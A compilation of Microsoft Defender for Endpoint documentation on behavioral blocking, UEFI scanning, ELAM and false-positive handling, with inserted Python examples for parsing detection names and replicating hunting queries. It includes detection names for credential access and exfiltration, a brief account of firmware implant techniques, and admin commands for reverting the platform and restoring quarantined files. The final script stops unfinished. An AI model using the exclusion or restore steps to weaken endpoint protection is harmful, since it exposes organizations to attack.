Want to experience Defender for Endpoint? Sign up for a free trial.

Overview
Client behavioral blocking is a component of behavioral blocking and containment
capabilities in Defender for Endpoint. As suspicious behaviors are detected on devices
(also referred to as clients or endpoints), artifacts (such as files or applications) are
blocked, checked, and remediated automatically.

Antivirus protection works best when paired with cloud protection.


How client behavioral blocking works
Microsoft Defender Antivirus can detect suspicious behavior, malicious code, fileless and
in-memory attacks, and more on a device. When suspicious behaviors are detected,
Microsoft Defender Antivirus monitors and sends those suspicious behaviors and their
process trees to the cloud protection service. Machine learning differentiates between
malicious applications and good behaviors within milliseconds, and classifies each
artifact. In almost real time, as soon as an artifact is found to be malicious, it's blocked
on the device.

Whenever a suspicious behavior is detected, an alert is generated. While the attack
is detected and stopped, alerts, such as an "initial access alert," are triggered
and appear in the Microsoft Defender portal (formerly Microsoft Defender XDR).

Client behavioral blocking is effective because it not only helps prevent an attack from
starting, it can help stop an attack that has begun executing. And, with feedback-loop
blocking (another capability of behavioral blocking and containment), attacks are
prevented on other devices in your organization.

Behavior-based detections

Behavior-based detections are named according to the MITRE ATT&CK Matrix for
Enterprise. The naming convention helps identify the attack stage where the malicious
behavior was observed:

Tactic | Detection threat name
Initial Access | Behavior:Win32/InitialAccess.*!ml
Execution | Behavior:Win32/Execution.*!ml
Persistence | Behavior:Win32/Persistence.*!ml
Privilege Escalation | Behavior:Win32/PrivilegeEscalation.*!ml
Defense Evasion | Behavior:Win32/DefenseEvasion.*!ml
Credential Access | Behavior:Win32/CredentialAccess.*!ml
Discovery | Behavior:Win32/Discovery.*!ml
Lateral Movement | Behavior:Win32/LateralMovement.*!ml
Collection | Behavior:Win32/Collection.*!ml
Command and Control | Behavior:Win32/CommandAndControl.*!ml
Exfiltration | Behavior:Win32/Exfiltration.*!ml
Impact | Behavior:Win32/Impact.*!ml
Uncategorized | Behavior:Win32/Generic.*!ml
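The naming convention in the table lends itself to automatic triage: a SOC can read the ATT&CK tactic straight out of the threat name instead of looking each detection up by hand. The following Python is an added example, not code from the Microsoft documentation or from the product; it parses a Win32 behavior-based detection name into its platform, tactic and variant using the table above, and counts detections per tactic. The threat names in SAMPLE_THREAT_NAMES are constructed for illustration (the variant letters are placeholders), and names that don't follow the Behavior:Win32/<Tactic>.<variant>!ml pattern are grouped as "Other".

```python
import re
from typing import Dict, List, Optional

# Tactic names exactly as they appear in the naming table on this page, keyed by
# the token used inside the threat name. "Generic" is the one special case: it
# maps to "Uncategorized" rather than to an ATT&CK tactic.
TACTIC_BY_TOKEN = {
    "InitialAccess": "Initial Access",
    "Execution": "Execution",
    "Persistence": "Persistence",
    "PrivilegeEscalation": "Privilege Escalation",
    "DefenseEvasion": "Defense Evasion",
    "CredentialAccess": "Credential Access",
    "Discovery": "Discovery",
    "LateralMovement": "Lateral Movement",
    "Collection": "Collection",
    "CommandAndControl": "Command and Control",
    "Exfiltration": "Exfiltration",
    "Impact": "Impact",
    "Generic": "Uncategorized",
}

# Behavior:Win32/<Token>.<variant>!ml -- the ".*" in the table is a wildcard for
# the variant part, and the "!ml" suffix marks a machine-learning behavior detection.
# The match is deliberately exact: no suffix, or a different platform, is no match.
_BEHAVIOR_NAME = re.compile(
    r"^Behavior:(?P<platform>Win32)/(?P<token>[A-Za-z]+)\.(?P<variant>[^!]+)!ml$"
)

# Constructed sample threat names (variant letters are placeholders).
SAMPLE_THREAT_NAMES = [
    "Behavior:Win32/CredentialAccess.A!ml",
    "Behavior:Win32/CredentialAccess.B!ml",
    "Behavior:Win32/PrivilegeEscalation.Q!ml",
    "Behavior:Win32/Generic.B!ml",
    "Trojan:Win32/Sample.A",  # not a behavior-based detection; lands in "Other"
]


def parse_behavior_detection(threat_name: str) -> Optional[Dict[str, str]]:
    """Split a behavior-based detection name into platform, tactic and variant.

    Returns None when the name is not a Win32 behavior-based detection, or when
    its tactic token is not one listed in the table.
    """
    m = _BEHAVIOR_NAME.match(threat_name)
    if not m:
        return None
    tactic = TACTIC_BY_TOKEN.get(m.group("token"))
    if tactic is None:
        return None
    return {"platform": m.group("platform"), "tactic": tactic, "variant": m.group("variant")}


def tactic_for_threat_name(threat_name: str) -> Optional[str]:
    """Return just the ATT&CK tactic (or 'Uncategorized'), or None if not applicable."""
    parsed = parse_behavior_detection(threat_name)
    return parsed["tactic"] if parsed else None


def summarize_by_tactic(threat_names: List[str]) -> Dict[str, int]:
    """Count detections per tactic; names the table does not cover go under 'Other'."""
    counts: Dict[str, int] = {}
    for name in threat_names:
        tactic = tactic_for_threat_name(name) or "Other"
        counts[tactic] = counts.get(tactic, 0) + 1
    return counts


if __name__ == "__main__":
    for name in SAMPLE_THREAT_NAMES:
        print(f"{name:45s} -> {tactic_for_threat_name(name)}")
    print(summarize_by_tactic(SAMPLE_THREAT_NAMES))
```

A practical use is to feed the ThreatName column of antivirus detection events through summarize_by_tactic to see which attack stage is generating most of a queue's behavior-based alerts; because the match is exact, a detection from another platform or without the !ml suffix is reported as "Other" rather than silently assigned a tactic.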

Tip

To learn more about specific threats, see recent global threat activity.

Configuring client behavioral blocking

If your organization is using Defender for Endpoint, client behavioral blocking is enabled
by default. However, to benefit from all Defender for Endpoint capabilities, including
behavioral blocking and containment, make sure the following features and capabilities
of Defender for Endpoint are enabled and configured:

Defender for Endpoint baselines
Devices onboarded to Defender for Endpoint
EDR in block mode
Attack surface reduction
Next-generation protection (antivirus, antimalware, and other threat protection
capabilities)

Tip

If you're looking for antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

Feedback-loop blocking
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Overview
Feedback-loop blocking, also referred to as rapid protection, is a component of
behavioral blocking and containment capabilities in Microsoft Defender for Endpoint.
With feedback-loop blocking, devices across your organization are better protected
from attacks.

How feedback-loop blocking works

When a suspicious behavior or file is detected, such as by Microsoft Defender Antivirus,
information about that artifact is sent to multiple classifiers. The rapid protection loop
engine inspects and correlates the information with other signals to arrive at a decision
as to whether to block a file. Checking and classifying artifacts happens quickly. It results
in rapid blocking of confirmed malware, and drives protection across the entire
ecosystem.

With rapid protection in place, an attack can be stopped on a device, other devices in
the organization, and devices in other organizations, as an attack attempts to broaden
its foothold.

Configuring feedback-loop blocking

If your organization is using Defender for Endpoint, feedback-loop blocking is enabled
by default. However, rapid protection occurs through a combination of Defender for
Endpoint capabilities, machine learning protection features, and signal-sharing across
Microsoft security services. Make sure the following features and capabilities of
Defender for Endpoint are enabled and configured:

Microsoft Defender for Endpoint baselines
Devices onboarded to Microsoft Defender for Endpoint
EDR in block mode
Attack surface reduction
Next-generation protection (antivirus)

Tip

If you're looking for antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Related articles
Behavioral blocking and containment

(Blog) Behavioral blocking and containment: Transforming optics into protection

Helpful Microsoft Defender for Endpoint resources

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

UEFI scanning in Defender for Endpoint
Article • 12/11/2023

Beginning June 17, 2020, Microsoft Defender for Endpoint extended its protection
capabilities to the firmware level with a new Unified Extensible Firmware Interface (UEFI)
scanner.

Hardware and firmware-level attacks have continued to rise in recent years, as modern
security solutions made persistence and detection evasion on the operating system
more difficult. Attackers compromise the boot flow to achieve low-level malware
behavior that's hard to detect, posing a significant risk to an organization's security
posture.

Windows Defender System Guard helps defend against firmware attacks by providing
guarantees for secure boot through hardware-backed security features like hypervisor-
level attestation and Secure Launch, also known as Dynamic Root of Trust (DRTM),
which are enabled by default in Secured-core PCs. The new UEFI scan engine in
Defender for Endpoint expands on these protections by making firmware scanning
broadly available.

The UEFI scanner is a new component of the built-in antivirus solution on Windows 10
and newer versions, and gives Defender for Endpoint the unique ability to scan inside of
the firmware filesystem and perform security assessment. It integrates insights from our
partner chipset manufacturers and further expands the comprehensive endpoint
protection provided by Defender for Endpoint.

Prerequisites

Microsoft Defender Antivirus as the primary antivirus product

Note

UEFI scanner does not work with Endpoint detection and response (EDR) in
block mode, since Microsoft Defender Antivirus would be operating in passive
mode.

Real-Time Protection should be ON
Behavior Monitoring should be ON
Supported version of Microsoft Defender Antivirus Platform Update (N-2)
Windows 10, Windows 11 and newer versions, Windows Server 2012 R2 and
Windows Server 2016 running the unified Defender for Endpoint client, Windows
Server 2019, Windows Server 2022 and newer versions

How did we build the UEFI scanner?

The Unified Extensible Firmware Interface (UEFI) is a replacement for legacy BIOS. If the
chipset is configured correctly (UEFI & chipset configuration itself) and secure boot is
enabled, the firmware is reasonably secure. To perform a hardware-based attack,
attackers exploit vulnerable firmware or a misconfigured machine to deploy a
rootkit, which allows attackers to gain a foothold on the machine.

As the figure shows, for devices that are configured correctly, the boot path from
power-on to OS initialization is reliable. If secure boot is disabled or if the motherboard
chipset is misconfigured, attackers can change the contents of UEFI drivers that are
unsigned or tampered with in the firmware. This could allow attackers to take over
control of devices and give them the capability to deprivilege the operating system
kernel or antivirus to reconfigure the security of the firmware.

The Serial Peripheral Interface (SPI) flash stores important information. Its structure
depends on the OEM's design, and commonly includes the processor microcode update, Intel
Management Engine (ME), and the boot image, a UEFI executable. When a computer runs,
processors execute the firmware code from SPI flash for a while during UEFI's SEC phase.
Instead of memory, the flash is permanently mapped to the x86 reset vector (physical
address 0xFFFF_FFF0). However, attackers can interfere with memory access to the reset
vector through software. They do this by reprogramming the BIOS control register on
misconfigured devices, making it even harder for security software to determine exactly
what gets executed during boot.

Once an implant is deployed, it's hard to detect. To catch threats at this level, security
solutions at the OS level rely on information from the firmware, but the chain of trust is
weakened.

Technically, the firmware is not stored and is not accessible from main memory. As
opposed to other software, it is stored in SPI flash storage, so the new UEFI scanner
must follow the hardware protocol provided by hardware manufacturers. To be
compatible and be up to date with all platforms, it needs to take into consideration
protocol differences.

The UEFI scanner performs dynamic analysis on the firmware it gets from the hardware
flash storage. By obtaining the firmware, the scanner is able to parse the firmware,
enabling Defender for Endpoint to inspect firmware content at runtime.

How do you turn on UEFI scanner?

The new UEFI scanner is a component of Microsoft Defender Antivirus, thus, as long as
it's the primary AV, it includes this capability to scan and access UEFI firmware.

How do you manage UEFI scanner?

It's a built-in functionality of Microsoft Defender Antivirus, thus, there is no additional
management.

How does the UEFI scanner in Defender for Endpoint work?

The new UEFI scanner reads the firmware file system at runtime by interacting with the
motherboard chipset. To detect threats, it performs dynamic analysis using multiple new
solution components that include:

UEFI anti-rootkit, which reaches the firmware through Serial Peripheral Interface (SPI)
Full filesystem scanner, which analyzes content inside the firmware
Detection engine, which identifies exploits and malicious behaviors

Firmware scanning is orchestrated by runtime events like suspicious driver load and
through periodic system scans. Detections are reported in Windows Security, under
Protection history.

Defender for Endpoint customers will also see these detections raised as alerts in
Microsoft Defender Security Center, empowering security operations teams to
investigate and respond to firmware attacks and suspicious activities at the firmware
level in their environments.

Security operations teams can also use the advanced hunting capabilities in Defender
for Endpoint to hunt for these threats:

Kusto

DeviceEvents
| where ActionType == "AntivirusDetection"
| extend ParsedFields=parse_json(AdditionalFields)
| extend ThreatName=tostring(ParsedFields.ThreatName)
| where ThreatName contains_cs "UEFI"
| project ThreatName, FileName, SHA1, DeviceName, Timestamp
| limit 100

To detect unknown threats in SPI flash, signals from the UEFI scanner are analyzed to
identify anomalies and where they have been executed. Anomalies are reported to the
Microsoft Defender Security Center for investigation.

These events can likewise be queried through Advanced Hunting as shown:

Kusto

DeviceAlertEvents
| where Title has "UEFI"
| summarize Titles=make_set(Title) by DeviceName, DeviceId, bin(Timestamp, 1d)
| limit 100
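The two hunting queries above can be reasoned about offline against exported rows, which is useful when writing a detection rule or checking what a query would and would not return. The following Python is an added example, not code from the Microsoft documentation or from the product; it reproduces the logic of both queries over constructed DeviceEvents and DeviceAlertEvents rows (device names, hashes, file names, titles and threat names are placeholders, not real detections). It also makes explicit a difference the KQL hides: contains_cs in the first query is a case-sensitive substring match, whereas has in the second is a case-insensitive whole-term match.

```python
import json
import re
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# Constructed sample rows shaped like the DeviceEvents table. AdditionalFields is a
# JSON string, as it is in advanced hunting. All values are placeholders.
SAMPLE_DEVICE_EVENTS = [
    {"Timestamp": "2024-01-10T08:15:00Z", "DeviceName": "host-a", "ActionType": "AntivirusDetection",
     "FileName": "module.efi", "SHA1": "0000000000000000000000000000000000000001",
     "AdditionalFields": json.dumps({"ThreatName": "Trojan:UEFI/Sample.A"})},
    {"Timestamp": "2024-01-10T09:00:00Z", "DeviceName": "host-b", "ActionType": "AntivirusDetection",
     "FileName": "tool.exe", "SHA1": "0000000000000000000000000000000000000002",
     "AdditionalFields": json.dumps({"ThreatName": "Trojan:Win32/Sample.B"})},
    {"Timestamp": "2024-01-10T09:30:00Z", "DeviceName": "host-b", "ActionType": "AntivirusScanCompleted",
     "FileName": "", "SHA1": "",
     "AdditionalFields": json.dumps({"ThreatName": "Trojan:UEFI/Sample.A"})},  # wrong ActionType
    {"Timestamp": "2024-01-11T01:00:00Z", "DeviceName": "host-c", "ActionType": "AntivirusDetection",
     "FileName": "x.bin", "SHA1": "0000000000000000000000000000000000000003",
     "AdditionalFields": json.dumps({"ThreatName": "Trojan:uefi/Lower.A"})},  # lowercase: contains_cs misses it
    {"Timestamp": "2024-01-11T02:00:00Z", "DeviceName": "host-c", "ActionType": "AntivirusDetection",
     "FileName": "y.bin", "SHA1": "0000000000000000000000000000000000000004",
     "AdditionalFields": "not json"},  # parse_json() yields null, tostring(null) is ""
]

# Constructed sample rows shaped like the DeviceAlertEvents table.
SAMPLE_ALERT_EVENTS = [
    {"Timestamp": "2024-01-10T08:20:00Z", "DeviceName": "host-a", "DeviceId": "dev-a", "Title": "Suspicious UEFI firmware module"},
    {"Timestamp": "2024-01-10T17:00:00Z", "DeviceName": "host-a", "DeviceId": "dev-a", "Title": "Suspicious UEFI firmware module"},
    {"Timestamp": "2024-01-11T02:00:00Z", "DeviceName": "host-a", "DeviceId": "dev-a", "Title": "UEFI-related detection"},
    {"Timestamp": "2024-01-10T09:00:00Z", "DeviceName": "host-b", "DeviceId": "dev-b", "Title": "Possible privilege escalation using NTLM relay"},
    {"Timestamp": "2024-01-10T10:00:00Z", "DeviceName": "host-b", "DeviceId": "dev-b", "Title": "Malicious uefi component blocked"},
]

# KQL `has` matches a whole term, case-insensitively; a term boundary is any
# non-alphanumeric character, so "UEFI-related" still matches.
_UEFI_TERM = re.compile(r"(?<![A-Za-z0-9])UEFI(?![A-Za-z0-9])", re.IGNORECASE)


def _parse_ts(ts: str) -> datetime:
    # Advanced hunting timestamps are UTC; accept the trailing "Z" form.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def uefi_antivirus_detections(events: List[dict], limit: int = 100) -> List[dict]:
    """Equivalent of the first query: AntivirusDetection rows whose ThreatName
    (taken from the AdditionalFields JSON) contains "UEFI" case-sensitively."""
    rows = []
    for ev in events:
        if ev.get("ActionType") != "AntivirusDetection":
            continue
        try:
            fields = json.loads(ev.get("AdditionalFields") or "")
        except (TypeError, ValueError):
            fields = {}
        threat = str(fields.get("ThreatName", "")) if isinstance(fields, dict) else ""
        if "UEFI" not in threat:  # contains_cs: case-sensitive substring
            continue
        rows.append({"ThreatName": threat, "FileName": ev.get("FileName"), "SHA1": ev.get("SHA1"),
                     "DeviceName": ev.get("DeviceName"), "Timestamp": ev.get("Timestamp")})
        if len(rows) >= limit:
            break
    return rows


def uefi_alert_titles_by_device_day(alerts: List[dict], limit: int = 100) -> Dict[Tuple[str, str, str], List[str]]:
    """Equivalent of the second query: alerts whose Title has the term "UEFI",
    grouped by device and UTC day (bin(Timestamp, 1d)) with make_set(Title)."""
    groups: Dict[Tuple[str, str, str], set] = {}
    for al in alerts:
        if not _UEFI_TERM.search(al.get("Title", "")):
            continue
        day = _parse_ts(al["Timestamp"]).astimezone(timezone.utc).date().isoformat()
        key = (al["DeviceName"], al["DeviceId"], day)
        groups.setdefault(key, set()).add(al["Title"])
    # make_set() returns a dynamic array; sort it here for deterministic output.
    return {k: sorted(v) for k, v in list(groups.items())[:limit]}


if __name__ == "__main__":
    for row in uefi_antivirus_detections(SAMPLE_DEVICE_EVENTS):
        print(row)
    for key, titles in uefi_alert_titles_by_device_day(SAMPLE_ALERT_EVENTS).items():
        print(key, titles)
```

Note the two rows the first function drops that a casual reading of the query might expect to keep: the lowercase "uefi" threat name (contains_cs is case-sensitive) and the row whose AdditionalFields is not valid JSON. If a detection rule is meant to be tolerant of either, the KQL would need contains instead of contains_cs and a null check on ParsedFields.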

Comprehensive security levels up with low-level protections

The new UEFI scanner adds to a rich set of Microsoft technologies that integrate to
deliver chip-to-cloud security, from a strong hardware root of trust to cloud-powered
security solutions at the OS level.

Hardware-backed security features like Secure Launch and device attestation help stop
firmware attacks. These features, which are enabled by default in Secured-core PCs,
seamlessly integrate with Defender for Endpoint to provide comprehensive endpoint
protection.

With its UEFI scanner, Defender for Endpoint gets even richer visibility into threats at
the firmware level, on which attackers have been increasingly focusing their efforts.
Security operations teams can use this new level of visibility, along with the rich set of
detection and response capabilities in Defender for Endpoint, to investigate and contain
such advanced attacks.

This level of visibility is also available in Microsoft 365 Defender (M365D), which
delivers an even broader cross-domain defense that coordinates protection across
endpoints, identities, email, and apps.

Early Launch Antimalware (ELAM) and
Microsoft Defender Antivirus
Article • 02/27/2024

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Individual

Platforms:

Windows 11, Windows 10, Windows 8.1, Windows 8
Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows
Server 2012

Detecting malware that starts early in the boot cycle was a challenge before Windows 8.
To combat early boot threats such as rootkits or malicious drivers that can hide from
detection, as of August 1, 2012, Microsoft Defender Antivirus (MDAV) for Windows 8
and newer, or Windows Server 2012 and newer, incorporated a new feature called the Early
Launch Antimalware (ELAM) driver. Microsoft Defender Antivirus uses the Wdboot.sys driver,
which starts before other boot-start drivers, enables the evaluation of those drivers, and
helps the Windows kernel decide whether they should be initialized.

Where are ELAM detections logged?

ELAM detections are logged in the same location as other Microsoft Defender
Antivirus threats, such as Event ID 1006.

How do I keep the MDAV ELAM driver up to date?

The MDAV ELAM driver ships with the monthly "Platform update."

Can the Early Launch Antimalware (ELAM) policy be modified?

ELAM can be modified here: Computer Configuration > Administrative Templates >
System > Early Launch Antimalware.

How can I check that the MDAV ELAM driver is loaded?

Check the following registry value:

Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\EarlyLaunch
Value: BackupPath (string)
Data: C:\Windows\ELAMBKUP\WdBoot.sys

How do I revert the MDAV ELAM driver to a previous version?

Run MpCmdRun.exe from the antimalware platform folder with the -RevertPlatform switch:

C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>\MpCmdRun.exe -RevertPlatform

For example: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24010.12-0\MpCmdRun.exe -RevertPlatform

Address false positives/negatives in
Microsoft Defender for Endpoint
Article • 07/18/2023

Applies to:

Defender for Endpoint Plan 1
Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

In endpoint protection solutions, a false positive is an entity, such as a file or a process,
that was detected and identified as malicious even though the entity isn't actually a
threat. A false negative is an entity that wasn't detected as a threat, even though it
actually is malicious. False positives/negatives can occur with any threat protection
solution, including Defender for Endpoint.

Fortunately, steps can be taken to address and reduce these kinds of issues. If you're
seeing false positives/negatives occurring with Defender for Endpoint, your security
operations team can take steps to address them by using the following process:

1. Review and classify alerts
2. Review remediation actions that were taken
3. Review and define exclusions
4. Submit an entity for analysis
5. Review and adjust your threat protection settings

You can get help if you still have issues with false positives/negatives after performing
the tasks described in this article. See Still need help?

Note

This article is intended as guidance for security operators and security
administrators who are using Defender for Endpoint.

Part 1: Review and classify alerts

If you see an alert that arose because something's detected as malicious or suspicious
and it shouldn't be, you can suppress the alert for that entity. You can also suppress
alerts that aren't necessarily false positives, but are unimportant. We recommend that
you also classify alerts.

Managing your alerts and classifying true/false positives helps to train your threat
protection solution and can reduce the number of false positives or false negatives over
time. Taking these steps also helps reduce noise in your queue so that your security
team can focus on higher priority work items.

Determine whether an alert is accurate

Before you classify or suppress an alert, determine whether the alert is accurate, a false
positive, or benign.

1. In the Microsoft Defender portal, in the navigation pane, choose Incidents &
alerts and then select Alerts.

2. Select an alert to view more details about it. (To get help with this task, see Review
alerts in Defender for Endpoint.)

3. Depending on the alert status, take the steps described in the following table:

Alert status | What to do
The alert is accurate | Assign the alert, and then investigate it further.
The alert is a false positive | 1. Classify the alert as a false positive. 2. Suppress the alert. 3. Create an indicator for Microsoft Defender for Endpoint. 4. Submit a file to Microsoft for analysis.
The alert is accurate, but benign (unimportant) | Classify the alert as a true positive, and then suppress the alert.

Classify an alert
Alerts can be classified as false positives or true positives in the Microsoft Defender
portal. Classifying alerts helps train Defender for Endpoint so that over time, you'll see
more true alerts and fewer false alerts.

1. In the Microsoft Defender portal , in the navigation pane, choose Incidents &
alerts, select Alerts and then select an alert.

2. For the selected alert, select Manage alert. A flyout pane opens.

3. In the Manage alert section, in the Classification field, classify the alert (True
positive, Informational, expected activity, or False positive).

Tip

For more information about suppressing alerts, see Manage Defender for
Endpoint alerts. And, if your organization is using a security information and event
management (SIEM) server, make sure to define a suppression rule there, too.

Suppress an alert

If you have alerts that are either false positives or that are true positives but for
unimportant events, you can suppress those alerts in Microsoft Defender XDR.
Suppressing alerts helps reduce noise in your queue.

1. In the Microsoft Defender portal, in the navigation pane, choose Incidents &
alerts and then select Alerts.

2. Select an alert that you want to suppress to open its Details pane.

3. In the Details pane, choose the ellipsis (...), and then Create suppression rule.

4. Specify all the settings for your suppression rule, and then choose Save.

Tip

Need help with suppression rules? See Suppress an alert and create a new
suppression rule.

Part 2: Review remediation actions

Remediation actions, such as sending a file to quarantine or stopping a process, are
taken on entities (such as files) that are detected as threats. Several types of remediation
actions occur automatically through automated investigation and Microsoft Defender
Antivirus:

Quarantine a file
Remove a registry key
Kill a process
Stop a service
Disable a driver
Remove a scheduled task

Other actions, such as starting an antivirus scan or collecting an investigation package,
occur manually or through Live Response. Actions taken through Live Response can't be
undone.

After you've reviewed your alerts, your next step is to review remediation actions. If any
actions were taken as a result of false positives, you can undo most kinds of remediation
actions. Specifically, you can:

Restore a quarantined file from the Action Center
Undo multiple actions at one time
Remove a file from quarantine across multiple devices, and
Restore a file from quarantine

When you're done reviewing and undoing actions that were taken as a result of false
positives, proceed to review or define exclusions.

Review completed actions

1. In the Microsoft Defender portal , select Actions & submissions and then select
Action center.

2. Select the History tab to view a list of actions that were taken.

3. Select an item to view more details about the remediation action that was taken.

Restore a quarantined file from the Action Center

1. In the Microsoft Defender portal, select Actions & submissions and then select
Action center.

2. On the History tab, select an action that you want to undo.

3. In the flyout pane, select Undo. If the action can't be undone with this method, you
won't see an Undo button. (To learn more, see Undo completed actions.)

Undo multiple actions at one time

1. In the Microsoft Defender portal, select Actions & submissions and then select
Action center.

2. On the History tab, select the actions that you want to undo.

3. In the flyout pane on the right side of the screen, select Undo.

Remove a file from quarantine across multiple devices

1. In the Microsoft Defender portal, select Actions & submissions and then select
Action center.

2. On the History tab, select a file that has the Action type Quarantine file.

3. In the pane on the right side of the screen, select Apply to X more instances of
this file, and then select Undo.

Review quarantined messages

1. In the Microsoft Defender portal, in the navigation pane, under Email &
collaboration, select Exchange message trace.

2. Select a message to view details.

Restore file from quarantine

You can roll back and remove a file from quarantine if you've determined that it's clean
after an investigation. Run the following command on each device where the file was
quarantined.

1. Open Command Prompt as an administrator on the device:

a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.

2. Type the following command, and press Enter:

Console

"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name EUS:Win32/CustomEnterpriseBlock -All

Important

In some scenarios, the ThreatName may appear as
EUS:Win32/CustomEnterpriseBlock!cl. Defender for Endpoint will restore all
custom blocked files that were quarantined on this device in the last 30 days.
A file that was quarantined as a potential network threat might not be
recoverable. If a user attempts to restore the file after quarantine, that file
might not be accessible. This can be due to the system no longer having
network credentials to access the file. Typically, this is a result of a temporary
logon to a system or shared folder whose access tokens have expired.

3. In the pane on the right side of the screen, select Apply to X more instances of
this file, and then select Undo.

Part 3: Review or define exclusions

Caution

Before you define an exclusion, review the detailed information in Manage
exclusions for Microsoft Defender for Endpoint and Microsoft Defender
Antivirus. Keep in mind that every exclusion that is defined lowers your level of
protection.

An exclusion is an entity, such as a file or URL, that you specify as an exception to
remediation actions. The excluded entity can still get detected, but no remediation
actions are taken on that entity. That is, the detected file or process won't be stopped,
sent to quarantine, removed, or otherwise changed by Microsoft Defender for Endpoint.

To define exclusions across Microsoft Defender for Endpoint, perform the following
tasks:

Define exclusions for Microsoft Defender Antivirus
Create "allow" indicators for Microsoft Defender for Endpoint

Note

Microsoft Defender Antivirus exclusions apply only to antivirus protection, not
across other Microsoft Defender for Endpoint capabilities. To exclude files broadly,
use exclusions for Microsoft Defender Antivirus and custom indicators for
Microsoft Defender for Endpoint.

The procedures in this section describe how to define exclusions and indicators.

Exclusions for Microsoft Defender Antivirus

In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus.
Make sure that you define exclusions sparingly, and that you only include the files,
folders, processes, and process-opened files that are resulting in false positives. In
addition, make sure to review your defined exclusions regularly. We recommend using
Microsoft Intune to define or edit your antivirus exclusions; however, you can use other
methods, such as Group Policy (see Manage Microsoft Defender for Endpoint).

Tip

Need help with antivirus exclusions? See Configure and validate exclusions for
Microsoft Defender Antivirus.

Use Intune to manage antivirus exclusions (for existing policies)

1. In the Microsoft Intune admin center, choose Endpoint security > Antivirus, and
then select an existing policy. (If you don't have an existing policy, or you want to
create a new policy, skip to Use Intune to create a new antivirus policy with
exclusions.)

2. Choose Properties, and next to Configuration settings, choose Edit.

3. Expand Microsoft Defender Antivirus Exclusions and then specify your exclusions.

Excluded Extensions are exclusions that you define by file type extension.
These extensions apply to any file name that has the defined extension,
regardless of file path or folder. Separate each file type in the list with a |
character. For example, lib|obj. For more information, see ExcludedExtensions.
Excluded Paths are exclusions that you define by their location (path). These
types of exclusions are also known as file and folder exclusions. Separate
each path in the list with a | character. For example, C:\Example|C:\Example1.
For more information, see ExcludedPaths.
Excluded Processes are exclusions for files that are opened by certain
processes. Separate each process in the list with a | character. For example,
C:\Example.exe|C:\Example1.exe. These exclusions aren't for the actual
processes. To exclude processes, you can use file and folder exclusions. For
more information, see ExcludedProcesses.

4. Choose Review + save, and then choose Save.

Use Intune to create a new antivirus policy with exclusions


1. In the Microsoft Intune admin center, choose Endpoint security > Antivirus > +
Create Policy.

2. Select a platform (such as Windows 10, Windows 11, and Windows Server).

3. For Profile, select Microsoft Defender Antivirus exclusions, and then choose
Create.

4. On the Create profile step, specify a name and description for the profile, and then
choose Next.

5. On the Configuration settings tab, specify your antivirus exclusions, and then
choose Next.

Excluded Extensions are exclusions that you define by file type extension.
These extensions apply to any file name that has the defined extension,
regardless of file path or folder. Separate each file type in the list with a |
character. For example, lib|obj. For more information, see
ExcludedExtensions.
Excluded Paths are exclusions that you define by their location (path). These
types of exclusions are also known as file and folder exclusions. Separate
each path in the list with a | character. For example, C:\Example|C:\Example1.
For more information, see ExcludedPaths.
Excluded Processes are exclusions for files that are opened by certain
processes. Separate each process in the list with a | character. For example,
C:\Example.exe|C:\Example1.exe. These exclusions aren't for the actual
processes. To exclude processes, you can use file and folder exclusions. For
more information, see ExcludedProcesses.

6. On the Scope tags tab, if you're using scope tags in your organization, specify
scope tags for the policy you're creating. (See Scope tags.)

7. On the Assignments tab, specify the users and groups to whom your policy should
be applied, and then choose Next. (If you need help with assignments, see Assign
user and device profiles in Microsoft Intune.)

8. On the Review + create tab, review the settings, and then choose Create.
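
Before saving either kind of Intune profile, it is worth checking the exclusion strings themselves. The following script is an added example (not Microsoft's code) that splits the "|"-separated ExcludedExtensions, ExcludedPaths and ExcludedProcesses values the steps above describe and flags entries that are broader than a false-positive fix normally needs: extensions that carry executable content, whole-drive paths, user-writable folders, and process entries that don't name an executable. The risky-entry lists and heuristics are this example's own choices, and the sample profile at the bottom is constructed from the article's own examples plus three deliberately broad entries.

```python
"""Audit Intune-style exclusion lists for Microsoft Defender Antivirus.

Added example, not Microsoft's code. Intune stores each exclusion list as one
string whose entries are separated by '|' (for example "lib|obj" or
"C:\\Example|C:\\Example1"). The functions below split those strings and flag
entries that are broader than a false-positive fix normally needs. The
"risky" lists and the heuristics are this example's own choices.
"""
import ntpath

# Extensions that routinely carry executable content; excluding one of them
# removes every such file, on every path, from antivirus scanning.
RISKY_EXTENSIONS = {"exe", "dll", "com", "bat", "cmd", "ps1", "vbs", "js", "scr"}

# Folder fragments that unprivileged users can write to (constructed list).
USER_WRITABLE_HINTS = ("\\temp\\", "\\downloads\\", "\\users\\public\\")


def split_list(setting: str) -> list[str]:
    """Split an Intune '|'-separated exclusion string into trimmed entries."""
    return [entry.strip() for entry in setting.split("|") if entry.strip()]


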